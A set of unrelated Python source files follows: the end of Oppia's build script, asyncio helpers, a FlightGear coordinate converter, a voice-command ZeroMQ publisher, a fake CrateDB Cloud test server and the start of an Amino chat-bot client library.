return delete_tasks
def get_recently_changed_filenames(source_dir_hashes, out_dir):
"""Compare hashes of source files and built files. Return a list of
filenames that were recently changed. Skips files that are not supposed to
built or already built.
Args:
source_dir_hashes: dict(str, str). Dictionary of hashes of files
to be built.
out_dir: str. Path relative to /oppia where built files are located.
Returns:
list(str). List of filenames expected to be re-hashed.
"""
# Hashes are created based on files' contents and are inserted between
# the filenames and their extensions,
    # e.g. base.240933e7564bd72a4dde42ee23260c5f.html.
# If a file gets edited, a different MD5 hash is generated.
recently_changed_filenames = []
# Currently, Python files and HTML files are always re-built.
file_extensions_not_to_track = ('.html', '.py',)
for filename, md5_hash in source_dir_hashes.items():
# Skip files that are already built or should not be built.
if should_file_be_built(filename) and not any(
filename.endswith(p) for p in file_extensions_not_to_track):
final_filepath = _insert_hash(
os.path.join(out_dir, filename), md5_hash)
if not os.path.isfile(final_filepath):
# Filename with provided hash cannot be found, this file has
# been recently changed or created since last build.
recently_changed_filenames.append(filename)
if recently_changed_filenames:
python_utils.PRINT(
'The following files will be rebuilt due to recent changes: %s'
% recently_changed_filenames)
return recently_changed_filenames
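# Illustrative sketch (not part of the original script): the hash-in-filename
# convention described above. The real _insert_hash helper is defined
# elsewhere in this script; the toy version below only demonstrates the
# assumed naming scheme, where the MD5 hash sits between the base name and
# the extension.
def _demo_hash_in_filename_convention():
    """Shows how 'pages/base.html' is renamed once its hash is known."""
    filepath = 'pages/base.html'
    md5_hash = '240933e7564bd72a4dde42ee23260c5f'
    root, extension = os.path.splitext(filepath)
    hashed_filepath = '%s.%s%s' % (root, md5_hash, extension)
    assert hashed_filepath == (
        'pages/base.240933e7564bd72a4dde42ee23260c5f.html')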
def generate_build_tasks_to_build_directory(dirnames_dict):
"""This function queues up build tasks to build all files in source
directory if there is no existing staging directory. Otherwise, selectively
queue up build tasks to build recently changed files.
Args:
dirnames_dict: dict(str, str). This dict should contain three keys,
with corresponding values as follows:
- 'dev_dir': the directory that contains source files to be built.
- 'staging_dir': the directory that contains minified files waiting
for final copy process.
- 'out_dir': the final directory that contains built files with hash
inserted into filenames.
Returns:
deque(Thread). A deque that contains all build tasks queued
to be processed.
"""
source_dir = dirnames_dict['dev_dir']
staging_dir = dirnames_dict['staging_dir']
out_dir = dirnames_dict['out_dir']
build_tasks = collections.deque()
if not os.path.isdir(staging_dir):
# If there is no staging dir, perform build process on all files.
python_utils.PRINT('Creating new %s folder' % staging_dir)
ensure_directory_exists(staging_dir)
build_tasks += generate_build_tasks_to_build_all_files_in_directory(
source_dir, staging_dir)
else:
# If staging dir exists, rebuild all HTML and Python files.
file_extensions_to_always_rebuild = ('.html', '.py',)
python_utils.PRINT(
'Staging dir exists, re-building all %s files'
% ', '.join(file_extensions_to_always_rebuild))
filenames_to_always_rebuild = get_filepaths_by_extensions(
source_dir, file_extensions_to_always_rebuild)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, filenames_to_always_rebuild)
dev_dir_hashes = get_file_hashes(source_dir)
source_hashes = {}
source_hashes.update(dev_dir_hashes)
# Clean up files in staging directory that cannot be found in file
# hashes dictionary.
_execute_tasks(generate_delete_tasks_to_remove_deleted_files(
source_hashes, staging_dir))
python_utils.PRINT(
'Getting files that have changed between %s and %s'
% (source_dir, out_dir))
recently_changed_filenames = get_recently_changed_filenames(
dev_dir_hashes, out_dir)
if recently_changed_filenames:
python_utils.PRINT(
'Re-building recently changed files at %s' % source_dir)
build_tasks += generate_build_tasks_to_build_files_from_filepaths(
source_dir, staging_dir, recently_changed_filenames)
else:
python_utils.PRINT(
'No changes detected. Using previously built files.')
return build_tasks
def _verify_filepath_hash(relative_filepath, file_hashes):
"""Ensure that hashes in filepaths match with the hash entries in hash
dict.
Args:
relative_filepath: str. Filepath that is relative from /build.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
Raises:
ValueError. The hash dict is empty.
ValueError. Filepath has less than 2 partitions after splitting by '.'
delimiter.
ValueError. The filename does not contain hash.
KeyError. The filename's hash cannot be found in the hash dict.
"""
# Final filepath example:
# pages/base.240933e7564bd72a4dde42ee23260c5f.html.
if not file_hashes:
raise ValueError('Hash dict is empty')
filename_partitions = relative_filepath.split('.')
if len(filename_partitions) < 2:
raise ValueError('Filepath has less than 2 partitions after splitting')
hash_string_from_filename = filename_partitions[-2]
# Ensure hash string obtained from filename follows MD5 hash format.
if not re.search(r'([a-fA-F\d]{32})', relative_filepath):
if relative_filepath not in file_hashes:
return
raise ValueError(
'%s is expected to contain MD5 hash' % relative_filepath)
if hash_string_from_filename not in file_hashes.values():
raise KeyError(
'Hash from file named %s does not match hash dict values' %
relative_filepath)
def _verify_hashes(output_dirnames, file_hashes):
"""Verify a few metrics after build process finishes:
1) The hashes in filenames belongs to the hash dict.
2) hashes.json, third_party.min.css and third_party.min.js are built and
hashes are inserted.
Args:
output_dirnames: list(str). List of directory paths that contain
built files.
file_hashes: dict(str, str). Dictionary with filepaths as keys and
hashes of file content as values.
"""
# Make sure that hashed file name matches with current hash dict.
for built_dir in output_dirnames:
for root, _, filenames in os.walk(built_dir):
for filename in filenames:
parent_dir = os.path.basename(root)
converted_filepath = os.path.join(
THIRD_PARTY_GENERATED_DEV_DIR, parent_dir, filename)
if hash_should_be_inserted(converted_filepath):
# Obtain the same filepath format as the hash dict's key.
relative_filepath = os.path.relpath(
os.path.join(root, filename), built_dir)
_verify_filepath_hash(relative_filepath, file_hashes)
hash_final_filename = _insert_hash(
HASHES_JSON_FILENAME, file_hashes[HASHES_JSON_FILENAME])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_js_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)])
# The path in hashes.json (generated via file_hashes) file is in posix
# style, see the comment above HASHES_JSON_FILENAME for details.
third_party_css_final_filename = _insert_hash(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH,
file_hashes[common.convert_to_posixpath(
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)])
_ensure_files_exist([
os.path.join(ASSETS_OUT_DIR, hash_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_js_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_css_final_filename)])
def generate_hashes():
"""Generates hashes for files."""
# The keys for hashes are filepaths relative to the subfolders of the future
# /build folder. This is so that the replacing inside the HTML files works
# correctly.
hashes = dict()
# Create hashes for all directories and files.
hash_dirs = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir'],
THIRD_PARTY_GENERATED_DEV_DIR]
for hash_dir in hash_dirs:
hashes.update(get_file_hashes(hash_dir))
# Save hashes as JSON and write the JSON into JS file
# to make the hashes available to the frontend.
save_hashes_to_file(hashes)
# Update hash dict with newly created hashes.json.
hashes.update(
{HASHES_JSON_FILENAME: generate_md5_hash(HASHES_JSON_FILEPATH)})
# Make sure /assets/hashes.json is available to the frontend.
_ensure_files_exist([HASHES_JSON_FILEPATH])
return hashes
def generate_build_directory(hashes):
"""Generates hashes for files. Minifies files and interpolates paths
in HTMLs to include hashes. Renames the files to include hashes and copies
them into build directory.
"""
python_utils.PRINT('Building Oppia in production mode...')
build_tasks = collections.deque()
copy_tasks = collections.deque()
# Build files in /extensions and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
EXTENSIONS_DIRNAMES_TO_DIRPATHS)
# Minify all template files and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS)
_execute_tasks(build_tasks)
# Copy all files from staging directory to production directory.
copy_input_dirs = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['staging_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['staging_dir'],
THIRD_PARTY_GENERATED_DEV_DIR,
WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
copy_output_dirs = [
ASSETS_OUT_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir'],
THIRD_PARTY_GENERATED_OUT_DIR, WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
assert len(copy_input_dirs) == len(copy_output_dirs)
for i in python_utils.RANGE(len(copy_input_dirs)):
safe_delete_directory_tree(copy_output_dirs[i])
copy_tasks += generate_copy_tasks_to_copy_from_source_to_target(
copy_input_dirs[i], copy_output_dirs[i], hashes)
_execute_tasks(copy_tasks)
_verify_hashes(copy_output_dirs, hashes)
source_dirs_for_assets = [ASSETS_DEV_DIR, THIRD_PARTY_GENERATED_DEV_DIR]
output_dirs_for_assets = [ASSETS_OUT_DIR, THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(source_dirs_for_assets, output_dirs_for_assets)
source_dirs_for_third_party = [THIRD_PARTY_GENERATED_DEV_DIR]
output_dirs_for_third_party = [THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(
source_dirs_for_third_party, output_dirs_for_third_party)
source_dirs_for_webpack = [WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
output_dirs_for_webpack = [WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(
source_dirs_for_webpack, output_dirs_for_webpack)
source_dirs_for_extensions = [
EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir']]
output_dirs_for_extensions = [EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(source_dirs_for_extensions, output_dirs_for_extensions)
source_dirs_for_templates = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir']]
output_dirs_for_templates = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(source_dirs_for_templates, output_dirs_for_templates)
python_utils.PRINT('Build completed.')
def main(args=None):
"""The main method of this script."""
options = _PARSER.parse_args(args=args)
if options.maintenance_mode and not options.prod_env:
raise Exception(
'maintenance_mode should only be enabled in prod build.')
# Regenerate /third_party/generated from scratch.
safe_delete_directory_tree(THIRD_PARTY_GENERATED_DEV_DIR)
build_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
# If minify_third_party_libs_only is set to True, skips the rest of the
# build process once third party libs are minified.
if options.minify_third_party_libs_only:
if options.prod_env:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
return
else:
raise Exception(
'minify_third_party_libs_only should not be '
'set in non-prod env.')
modify_constants(
prod_env=options.prod_env,
emulator_mode=not options.deploy_mode,
maintenance_mode=options.maintenance_mode)
if options.prod_env:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
hashes = generate_hashes()
if options.deparallelize_terser:
if options.source_maps:
raise Exception(
'source_maps flag shouldn\'t be used with '
'deparallelize_terser flag.')
build_using_webpack(WEBPACK_TERSER_CONFIG)
elif options.source_maps:
build_using_webpack(WEBPACK_PROD_SOURCE_MAPS_CONFIG)
else:
build_using_webpack(WEBPACK_PROD_CONFIG)
generate_app_yaml(
deploy_mode=options.deploy_mode,
maintenance_mode=options.maintenance_mode)
generate_build_directory(hashes)
save_hashes_to_file(dict())
# The 'no coverage' pragma is used as this line is un-testable. This is because
# it will only be called when build.py is used as a script.
if __name__ == '__main__': # pragma: no cover
main()
|
utils.py
|
import asyncio
from concurrent.futures import Future
import functools
import threading
import typing as tp
from pypeln import utils as pypeln_utils
def Namespace(**kwargs) -> tp.Any:
return pypeln_utils.Namespace(**kwargs)
def get_running_loop() -> asyncio.AbstractEventLoop:
try:
loop = asyncio.get_event_loop()
except RuntimeError:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
if not loop.is_running():
def run():
loop.run_forever()
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
return loop
def run_coroutine_in_loop(
f_coro: tp.Callable[[], tp.Awaitable],
loop: tp.Optional[asyncio.AbstractEventLoop] = None,
) -> Future:
loop = loop if loop else get_running_loop()
return asyncio.run_coroutine_threadsafe(f_coro(), loop)
def run_function_in_loop(
f: tp.Callable[[], tp.Any],
loop: tp.Optional[asyncio.AbstractEventLoop] = None,
) -> asyncio.Handle:
loop = loop if loop else get_running_loop()
return loop.call_soon_threadsafe(f)
def run_test_async(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
return run_coroutine_in_loop(lambda: f(*args, **kwargs)).result()
return wrapped
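# Illustrative usage sketch (not part of the original module): run_test_async
# lets a plain synchronous caller invoke an async function by scheduling the
# coroutine on the shared background event loop and blocking on the resulting
# concurrent.futures.Future. The demo function name is arbitrary.
@run_test_async
async def _demo_async_double(x: int) -> int:
    await asyncio.sleep(0)
    return 2 * x
if __name__ == "__main__":
    # The decorated coroutine function can now be called synchronously.
    assert _demo_async_double(21) == 42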
|
fgbase.py
|
import threading
import socket
import time
import math
import typing
import numpy as np
import pymap3d as pm
from abc import ABC
from scipy.spatial.transform import Rotation
import csaf.core.trace
class Dubins2DConverter():
"""
Originally from John McCarroll, modified by Michal Podhradsky
Converts orientation and rotation from ENU to ECEF
"""
@staticmethod
def quaternion_from_lon_lat(lon: float, lat: float) -> typing.List[float]:
"""
A helper function to calculate a quaternion representation of a rotation from ENU to ECEF
parameters: longitude and latitude (radians)
returns: list of quaternion components (scalar last)
"""
zd2 = 0.5 * lon
yd2 = -0.25 * math.pi - 0.5 * lat
Szd2 = math.sin(zd2)
Syd2 = math.sin(yd2)
Czd2 = math.cos(zd2)
Cyd2 = math.cos(yd2)
w = Czd2 * Cyd2
x = -Szd2 * Syd2
y = Czd2 * Syd2
z = Szd2 * Cyd2
return [x, y, z, w]
@classmethod
def convert_to_ecef(cls, pn_m: float, pe_m: float, pu_m: float,
phi_rad: float, theta_rad: float, psi_rad: float,
lat0_rad: float, lon0_rad: float, h0_m: float) -> typing.Tuple[float]:
"""
        Converts a single ENU state (position pn/pe/pu in meters, attitude
        phi/theta/psi in radians) at the origin given by lat0/lon0 (radians)
        and h0 (meters) into an ECEF position and an ECEF axis-angle
        orientation, returned as a 6-element tuple.
"""
# position conversions
## ENU to ECEF
# convert position to geocentric (Earth-centered) reference frame
ecef_x, ecef_y, ecef_z = pm.enu2ecef(pe_m, pn_m, pu_m, lat0_rad, lon0_rad, h0_m, ell=None, deg=False)
# orientation conversions
## ECEF
# 1st rotation (frame alignment)
global_rotation = Rotation.from_quat(Dubins2DConverter.quaternion_from_lon_lat(
lon0_rad, lat0_rad))
# 2nd rotation (from data)
local_rotation = Rotation.from_euler('xyz', [phi_rad, theta_rad, psi_rad], degrees=False)
# multiply
rotation = global_rotation * local_rotation
quaternion = rotation.as_quat()
angle = 2 * math.acos(quaternion[3]) # cos(a / 2) = w
direction = quaternion / (math.sin(angle / 2)) # [Vx,Vy,Vz] * sin(a / 2) = [x,y,z]
ecef_x_orientation = direction[0] * angle
ecef_y_orientation = direction[1] * angle
ecef_z_orientation = direction[2] * angle
return (
ecef_x, ecef_y, ecef_z,
ecef_x_orientation,
ecef_y_orientation,
ecef_z_orientation
)
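# Illustrative usage sketch (not part of the original module): converting one
# ENU state to the ECEF position / axis-angle orientation tuple used for
# FlightGear visualisation. The origin values mirror the defaults declared on
# FlightGearBase below; the state values are arbitrary placeholders.
def _demo_dubins_to_ecef() -> typing.Tuple[float, ...]:
    lat0_rad = np.deg2rad(35.802117)
    lon0_rad = np.deg2rad(-117.806717)
    h0_m = 1500.0
    return Dubins2DConverter.convert_to_ecef(
        pn_m=100.0, pe_m=50.0, pu_m=10.0,
        phi_rad=0.0, theta_rad=0.05, psi_rad=1.57,
        lat0_rad=lat0_rad, lon0_rad=lon0_rad, h0_m=h0_m)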
class FlightGearBase(ABC):
# Start position of the aircraft
DEFAULT_FG_LAT = 35.802117
DEFAULT_FG_LON = -117.806717
DEFAULT_FG_GROUND_LEVEL = 1500 #715 # m
    # Default max values for actuators
DEFAULT_FG_AILERON_MAX_DEG = 21.5
DEFAULT_FG_ELEVATOR_MAX_DEG = 25
DEFAULT_FG_RUDDER_MAX_DEG = 30.0
FG_FT_IN_M = 3.2808
# Networking variables
DEFAULT_FG_IP = "127.0.0.1"
DEFAULT_DELTA_T = 0.5
# Class variables
reset_flag = False
plant = None
controller = None
lag = DEFAULT_DELTA_T
speed = 1.0
initial_time = None
sim_flag = False
stopped = False
main_loop = None
lat0 = np.deg2rad(DEFAULT_FG_LAT)
lon0 = np.deg2rad(DEFAULT_FG_LON)
h0 = DEFAULT_FG_GROUND_LEVEL
sock_args = (socket.AF_INET, socket.SOCK_DGRAM) # UDP
def __init__(self) -> None:
self.sock = socket.socket(*self.sock_args)
def reset(self):
"""
        Set the aircraft at the beginning of the trajectory
"""
self.reset_flag = True
def set_trajs(self, plant: csaf.trace.TimeTrace, controller: csaf.trace.TimeTrace):
"""
Set trajectories
"""
self.plant = plant
self.controller = controller
    def simulate(self, delta_t: float = 0.1, speed: float = 1.0):
"""
Start simulation, assuming trajectories are properly set
"""
self.lag = delta_t
self.speed = speed
self.initial_time = time.monotonic()
self.sim_flag = True
def start(self):
"""
Start the main loop of the component
"""
if self.main_loop is None:
self.main_loop = threading.Thread(target=self.sim_loop, args=[], daemon=True)
self.main_loop.start()
def stop(self):
"""
Stop the main loop of the component
"""
self.stopped = True
def pack_to_struct(self):
"""
Package the data into a network compatible struct
"""
pass
    def update_and_send(self, inputs: typing.Optional[typing.List[float]] = None):
"""
Update the internal values and send a FG compatible packet
The expected format of `inputs` is:
- float64 vt 0
- float64 alpha 1
- float64 beta 2
- float64 phi 3
- float64 theta 4
- float64 psi 5
- float64 p 6
- float64 q 7
- float64 r 8
- float64 pn 9
- float64 pe 10
- float64 h 11
- float64 pow 12
- float64 delta_e 13
- float64 delta_a 14
- float64 delta_r 15
- float64 throttle 16
"""
pass
def get_format_string(self) -> str:
"""
Returns format string for the network packet
"""
pass
def sim_loop(self):
"""
Main simulation loop
"""
print(f"<{self.__class__.__name__}> Starting main loop!")
while not self.stopped:
updated_input = None
if self.sim_flag:
real_time = time.monotonic()
sim_time = (real_time - self.initial_time)*self.speed
timestamp = next(filter(lambda x: x > sim_time, self.plant.times), None)
if timestamp:
# Plant states
idx = self.plant.times.index(timestamp)
states = self.plant.states[idx]
# Controller output
# TODO: if no controller is present, just fill in zeros
try:
idx = self.controller.times.index(timestamp)
except ValueError:
idx = 0
ctrls = self.controller.states[idx]
updated_input = np.concatenate((np.asarray(states),ctrls))
else:
self.sim_flag = False
self.lag = self.DEFAULT_DELTA_T
elif self.reset_flag:
idx = 0
states = self.plant.states[idx]
ctrls = self.controller.states[idx]
updated_input = np.concatenate((np.asarray(states),ctrls))
self.reset_flag = False
self.update_and_send(updated_input)
time.sleep(self.lag)
print(f"<{self.__class__.__name__}> Main loop stopped.")
|
VoiceEngineServer.py
|
import zmq
import time
from threading import *
import speech_recognition as sr
broadcastMSG = "None"
def Listener():
global broadcastMSG
while(1):
# obtain audio from the microphone
r = sr.Recognizer()
with sr.Microphone() as source:
print("Say something!")
audio = r.listen(source)
# recognize speech using Google Speech Recognition
try:
            recognizedCommand = r.recognize_google(audio)
print("Google Speech Recognition thinks you said " + recognizedCommand)
if(recognizedCommand == "start"):
broadcastMSG = "start"
elif(recognizedCommand == "stop"):
broadcastMSG = "stop"
elif(recognizedCommand == "clockwise"):
broadcastMSG = "clockwise"
elif(recognizedCommand == "counter clockwise"):
broadcastMSG = "counter clockwise"
except sr.UnknownValueError:
print("Google Speech Recognition could not understand audio")
except sr.RequestError as e:
print("Could not request results from Google Speech Recognition service; {0}".format(e))
if __name__ == "__main__":
    voiceThread = Thread(target=Listener)
    voiceThread.start()
ctx = zmq.Context.instance()
publisher = ctx.socket(zmq.PUB)
publisher.bind("tcp://*:9999")
counter = 0
lastMessage = "lastMessage"
while(1):
if(lastMessage != broadcastMSG):
publisher.send_string(broadcastMSG)
print("Broadcast Message " + str(counter) + " : " + broadcastMSG)
lastMessage = broadcastMSG
counter += 1
time.sleep(0.05)
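# Illustrative sketch (not part of the original script): a matching ZeroMQ
# subscriber for the voice commands broadcast above. It connects to the
# publisher's port 9999 and subscribes to every message (empty prefix). The
# loopback address is an assumption about where the server runs.
def _demo_voice_subscriber():
    sub_context = zmq.Context.instance()
    subscriber = sub_context.socket(zmq.SUB)
    subscriber.connect("tcp://127.0.0.1:9999")
    subscriber.setsockopt_string(zmq.SUBSCRIBE, "")
    while True:
        command = subscriber.recv_string()  # blocks until a broadcast arrives
        print("Received command: " + command)
        if command == "stop":
            break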
|
fake_cloud.py
|
# Licensed to CRATE Technology GmbH ("Crate") under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. Crate licenses
# this file to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may
# obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# However, if you have executed another commercial license agreement
# with Crate these terms will supersede the license and you may use the
# software solely pursuant to the terms of the relevant commercial agreement.
import json
import pathlib
import ssl
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread
from typing import Callable, Dict
from urllib import parse
class Response:
__slots__ = ("bytes", "status", "headers")
def __init__(self, *, text=None, json_data=None, status=200, headers=None):
self.status = status
self.headers = headers or {}
if json_data is not None:
self.headers.setdefault("Content-Type", "application/json")
text = json.dumps(json_data)
else:
text = text or ""
self.headers.setdefault("Content-Type", "text/html")
self.bytes = text.encode()
self.headers["Content-Length"] = len(self.bytes)
class FakeCrateDBCloudServer(HTTPServer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Load certificates and sign key used to simulate ssl/tls
here = pathlib.Path(__file__)
self.ssl_cert = here.parent / "server.crt"
ssl_key = here.parent / "server.key"
self.socket = ssl.wrap_socket(
self.socket,
keyfile=str(ssl_key),
certfile=str(self.ssl_cert),
server_side=True,
)
class FakeCrateDBCloudRequestHandler(BaseHTTPRequestHandler):
def __init__(self, *args, **kwargs):
self.routes: Dict[str, Callable[[], Response]] = {
"/data/data-key": self.data_data_key,
"/data/no-key": self.data_no_key,
"/errors/400": self.error_400,
"/text-response": self.text_response,
"/empty-response": self.empty_response,
"/redirect": self.redirect,
"/new-token": self.new_token,
"/client-headers": self.client_headers,
}
super().__init__(*args, **kwargs)
def do_GET(self):
parsed = parse.urlparse(self.path)
self.request_path = parsed.path
self.query = parse.parse_qs(parsed.query)
body_length = int(self.headers.get("Content-Length", 0))
if body_length > 0:
self.body = self.rfile.read(body_length)
else:
self.body = None
self.cookies = dict(
cookie.split("=", 1)
for cookie in self.headers.get_all("cookie", [])
if cookie
)
handler = self.routes.get(self.request_path, self.default_response)
response = handler()
self.send_response(response.status)
for header, value in response.headers.items():
self.send_header(header, value)
self.end_headers()
self.wfile.write(response.bytes)
do_DELETE = do_GET
do_HEAD = do_GET
do_PATCH = do_GET
do_POST = do_GET
do_PUT = do_GET
def default_response(self) -> Response:
return Response(
json_data={
"body": self.body,
"headers": dict(self.headers), # type: ignore
"method": self.command,
"path": self.request_path,
"query": self.query,
},
status=404,
)
def data_data_key(self) -> Response:
if self.is_authorized:
return Response(json_data={"data": {"key": "value"}}, status=200)
return Response(status=302, headers={"Location": "/"})
def data_no_key(self) -> Response:
if self.is_authorized:
return Response(json_data={"key": "value"})
return Response(status=302, headers={"Location": "/"})
def error_400(self) -> Response:
if self.is_authorized:
return Response(
json_data={
"message": "Bad request.",
"errors": {"key": "Error on 'key'"},
},
status=400,
)
return Response(status=302, headers={"Location": "/"})
def text_response(self) -> Response:
if self.is_authorized:
return Response(text="Non JSON response.", status=500)
return Response(status=302, headers={"Location": "/"})
def empty_response(self) -> Response:
if self.is_authorized:
return Response(status=204)
return Response(status=302, headers={"Location": "/"})
def redirect(self) -> Response:
return Response(status=301, headers={"Location": "/?rd=%2Fredirect"})
def new_token(self) -> Response:
return Response(
status=204, headers={"Set-Cookie": "session=new-token; Domain=127.0.0.1"}
)
def client_headers(self) -> Response:
return Response(json_data=dict(self.headers.items()))
@property
def is_authorized(self) -> bool:
if "session" in self.cookies:
if self.cookies["session"]:
return True
return False
def log_message(self, *args, **kwargs):
# Don't log anything during tests.
pass
class FakeCrateDBCloud:
def __init__(self):
self._server = FakeCrateDBCloudServer(
("127.0.0.1", 0), FakeCrateDBCloudRequestHandler
)
self._thread = Thread(target=self._server.serve_forever, daemon=True)
def start_in_background(self) -> "FakeCrateDBCloud":
self._thread.start()
return self
def wait_for_shutdown(self):
self._server.shutdown()
@property
def port(self):
return self._server.socket.getsockname()[1]
def __enter__(self):
return self.start_in_background()
def __exit__(self, exc_type, exc_value, traceback):
self.wait_for_shutdown()
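# Illustrative usage sketch (not part of the original module): the fake cloud
# is intended to be used as a context manager in tests. The `requests` client
# below is an assumption about the test environment; certificate verification
# is disabled because the bundled server.crt is self-signed.
def _demo_fake_cloud_roundtrip():
    import requests  # assumed to be available in the test environment
    with FakeCrateDBCloud() as cloud:
        url = "https://127.0.0.1:%d/data/data-key" % cloud.port
        response = requests.get(
            url, cookies={"session": "some-token"}, verify=False)
        assert response.status_code == 200
        assert response.json() == {"data": {"key": "value"}}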
|
BotAmino.py
|
import requests
import json
from time import sleep as slp
from sys import exit
from json import dumps
from pathlib import Path
from threading import Thread
# from concurrent.futures import ThreadPoolExecutor
from contextlib import suppress
from uuid import uuid4
from .local_amino import Client
from .commands import *
from .extensions import *
from .Bot import Bot
# this is Slimakoi's API with some of my patches
# API made by ThePhoenix78
# Big optimisation thanks to SempreLEGIT#1378 ♥
# small very small changes by meliodas
# if login method is not working use sid
path_utilities = "utilities"
path_amino = f'{path_utilities}/amino_list'
path_client = "client.txt"
NoneType = type(None)
with suppress(Exception):
for i in (path_utilities, path_amino):
Path(i).mkdir(exist_ok=True)
def print_exception(exc):
print(repr(exc))
class BotAmino(Command, Client, TimeOut, BannedWords):
def __init__(self, email: str = None, password: str = None, sid: str = None, proxies: dict = None, deviceId: str = "32255726EEA11E60ACD268CA4DD36C8E6517144FCD24D7A53B144DE77B57980B26386188009D2BDEDE", certificatePath: str = None):
Command.__init__(self)
Client.__init__(self, proxies=proxies, deviceId=deviceId, certificatePath=certificatePath)
if email and password:
self.login(email=email, password=password)
elif sid:
self.login_sid(SID=sid)
else:
try:
with open(path_client, "r") as file_:
para = file_.readlines()
self.login(email=para[0].strip(), password=para[1].strip())
except FileNotFoundError:
with open(path_client, 'w') as file_:
file_.write('email\npassword')
print("Please enter your email and password in the file client.txt")
print("-----end-----")
exit(1)
self.communaute = {}
self.botId = self.userId
self.len_community = 0
self.perms_list = []
self.prefix = "!"
self.activity = False
self.wait = 0
self.bio = None
self.self_callable = False
self.no_command_message = ""
self.spam_message = "You are spamming, be careful"
self.lock_message = "Command locked sorry"
self.launched = False
def tradlist(self, sub):
sublist = []
for elem in sub:
with suppress(Exception):
val = self.get_from_code(f"http://aminoapps.com/u/{elem}").objectId
sublist.append(val)
continue
sublist.append(elem)
return sublist
def send_data(self, data):
self.send(data)
def add_community(self, comId):
self.communaute[comId] = Bot(self, comId, self.prefix, self.bio, self.activity)
def get_community(self, comId):
return self.communaute[comId]
def is_it_bot(self, uid):
return uid == self.botId and not self.self_callable
def is_it_admin(self, uid):
return uid in self.perms_list
def get_wallet_amount(self):
return self.get_wallet_info().totalCoins
def generate_transaction_id(self):
return str(uuid4())
def start_screen_room(self, comId: str, chatId: str, joinType: int=1):
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = dumps(data)
self.send(data)
data = {
"o": {
"ndcId": int(comId),
"threadId": chatId,
"joinRole": joinType,
"channelType": 5,
"id": "2154531" # Need to change?
},
"t": 108
}
data = dumps(data)
self.send(data)
def join_screen_room(self, comId: str, chatId: str, joinType: int=1):
data = {
"o":
{
"ndcId": int(comId),
"threadId": chatId,
"joinRole": 2,
"id": "72446"
},
"t": 112
}
data = dumps(data)
self.send(data)
def start_voice_room(self, comId: str, chatId: str, joinType: int=1):
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = dumps(data)
self.send(data)
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"channelType": 1,
"id": "2154531" # Need to change?
},
"t": 108
}
data = dumps(data)
self.send(data)
def end_voice_room(self, comId: str, chatId: str, joinType: int = 2):
data = {
"o": {
"ndcId": comId,
"threadId": chatId,
"joinRole": joinType,
"id": "2154531" # Need to change?
},
"t": 112
}
data = dumps(data)
self.send(data)
def show_online(self, comId):
data = {
"o": {
"actions": ["Browsing"],
"target": f"ndc://x{comId}/",
"ndcId": int(comId),
"id": "82333"
},
"t":304}
data = dumps(data)
slp(2)
self.send(data)
    def upload_bubble(self, file, comId):
        data = file
        response = requests.post(f"https://service.narvii.com/api/v1/x{comId}/s/chat/chat-bubble/templates/107147e9-05c5-405f-8553-af65d2823457/generate", data=data, headers=self.headers)
        bid = json.loads(response.text)['chatBubble']['bubbleId']
        print(bid)
        response = requests.post(f"https://service.narvii.com/api/v1/x{comId}/s/chat/chat-bubble/{bid}", data=data, headers=self.headers)
        if response.status_code != 200:
            return json.loads(response.text)
        return bid
def check(self, args, *can, id_=None):
id_ = id_ if id_ else args.authorId
